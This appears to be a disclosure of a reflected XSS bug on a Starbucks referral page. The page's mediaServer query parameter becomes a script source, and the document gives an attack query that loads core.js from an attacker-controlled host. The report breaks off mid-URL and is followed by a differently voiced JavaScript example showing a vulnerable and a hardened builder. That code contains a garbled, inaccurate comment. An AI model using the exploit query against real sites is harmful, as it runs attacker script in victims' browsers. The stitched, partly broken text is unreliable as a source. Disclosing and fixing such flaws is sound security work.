I have found a reflected XSS vulnerability on http://refer.starbucks.com. Below are the details:
- Go to http://happymondays.starbucks.com, scroll down and click the "Invite a friend" button. You will be redirected to http://refer.starbucks.com/micro/microsite?source=redirect
- On http://refer.starbucks.com/micro/microsite?source=redirect there are three buttons, to "Spread the love":
SHARE WITH EMAIL
SHARE ON FACEBOOK
SHARE ON TWITTER
Clicking on each of them generates a request like this:
GET /xd-arbiter?mediaServer=http://tags.extole.com&clientId=106223&socketId=facebook_4 HTTP/1.1
Host: refer.starbucks.com
The use of an external server in the mediaServer parameter should immediately catch your attention; a quick look at the source code reveals a reflected XSS vulnerability, since the parameter is taken straight from the query string and used as a script source:
var MEDIA_SERVER = queryArgs.mediaServer;
var CLIENT_ID = queryArgs.clientId;
var SOCKET_ID = queryArgs.socketId;
(…)
insertScript(MEDIA_SERVER + '/' + CLIENT_ID + '/core.js');
So we have a MEDIA_SERVER ("https://lubi.cz", an attacker-controlled host), a CLIENT_ID ("starbucks", a folder on that host), a SOCKET_ID (whatever) and a core.js file ("https://lubi.cz/starbucks/
http://refer.starbucks.com/xd-
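To make the bug concrete, here is an added example (my own code, not the code from refer.starbucks.com or from extole.com) that models the xd-arbiter pattern above: a query-string parser, the vulnerable concatenation, and a hardened version beside it. The allowlisted host, the numeric-only client ID rule and the helper names are assumptions made for this example; the attacker query uses the lubi.cz host from the writeup.

```javascript
// Added example, not the page's own code. Models the vulnerable pattern
// insertScript(MEDIA_SERVER + '/' + CLIENT_ID + '/core.js') and a hardened form.

// Parse a query string ("?a=1&b=2") into an object, like the page's queryArgs.
function parseQueryArgs(search) {
  const args = {};
  const qs = search.startsWith('?') ? search.slice(1) : search;
  for (const pair of qs.split('&')) {
    if (!pair) continue;
    const idx = pair.indexOf('=');
    const key = decodeURIComponent(idx === -1 ? pair : pair.slice(0, idx));
    const val = decodeURIComponent(idx === -1 ? '' : pair.slice(idx + 1));
    args[key] = val;
  }
  return args;
}

// Vulnerable: whatever origin the attacker puts in mediaServer becomes the
// script source. Same concatenation as the original page.
function buildScriptUrlUnsafe(args) {
  const MEDIA_SERVER = args.mediaServer;
  const CLIENT_ID = args.clientId;
  return MEDIA_SERVER + '/' + CLIENT_ID + '/core.js';
}

// Hardened: allowlist the media-server host (assumption: tags.extole.com is the
// only legitimate one), always emit https, and accept only numeric client IDs.
// The URL is rebuilt from validated parts, so userinfo tricks such as
// "https://tags.extole.com@lubi.cz" and non-http schemes are rejected.
const ALLOWED_MEDIA_HOSTS = new Set(['tags.extole.com']);

function buildScriptUrlSafe(args) {
  let parsed;
  try {
    parsed = new URL(args.mediaServer || '');
  } catch (e) {
    return null; // not an absolute URL at all (e.g. "//lubi.cz")
  }
  if (!ALLOWED_MEDIA_HOSTS.has(parsed.hostname)) return null;
  const clientId = args.clientId || '';
  if (!/^\d{1,12}$/.test(clientId)) return null;
  return 'https://' + parsed.hostname + '/' + clientId + '/core.js';
}

// The sink itself. Guarded so the file also runs under Node without a DOM.
function insertScript(src) {
  if (typeof document === 'undefined') return false;
  const s = document.createElement('script');
  s.src = src;
  document.head.appendChild(s);
  return true;
}

// Constructed inputs: the legitimate request from the writeup and an attacker's.
const LEGIT_QUERY = '?mediaServer=http://tags.extole.com&clientId=106223&socketId=facebook_4';
const ATTACKER_QUERY = '?mediaServer=https://lubi.cz&clientId=starbucks&socketId=facebook_4';

function demo() {
  const legit = parseQueryArgs(LEGIT_QUERY);
  const evil = parseQueryArgs(ATTACKER_QUERY);
  return {
    unsafeLegit: buildScriptUrlUnsafe(legit),   // https loads attacker's script? no, extole's
    unsafeEvil: buildScriptUrlUnsafe(evil),     // https://lubi.cz/starbucks/core.js (XSS)
    safeLegit: buildScriptUrlSafe(legit),       // https://tags.extole.com/106223/core.js
    safeEvil: buildScriptUrlSafe(evil),         // null, request refused
  };
}

console.log(demo());
```

The key design choice is to never echo the attacker's string into the script URL: the hardened builder parses it, compares only the hostname against a fixed set, and then reassembles the URL from known-good pieces.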